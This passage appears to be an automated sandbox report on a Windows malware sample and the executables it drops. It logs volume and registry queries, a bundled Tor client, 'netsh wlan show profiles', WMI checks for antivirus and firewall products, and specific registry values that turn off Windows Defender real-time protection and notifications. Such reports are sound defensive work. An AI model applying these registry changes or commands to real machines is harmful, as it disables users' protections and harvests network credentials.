Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8F82.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9AED.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Queries volume information: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe VolumeInformation
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Queries volume information: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe	Queries volume information: C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\C4AD.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\WsatConfig.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\D9EC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\D9EC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Queries volume information: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\39D.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Queries volume information: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe VolumeInformation
Source: C:\Users\user\AppData\Local\932079.exe	Queries volume information: C:\Users\user\AppData\Local\932079.exe VolumeInformation
Source: C:\Users\user\AppData\Local\932079.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Queries volume information: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe

Code function: 3_2_0087C161 cpuid

3_2_0087C161

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00FC7155

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe

Code function: 6_2_00F45EE0 GetTimeZoneInformation,

6_2_00F45EE0

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00FC2BFB

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableRealtimeMonitoring 1

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

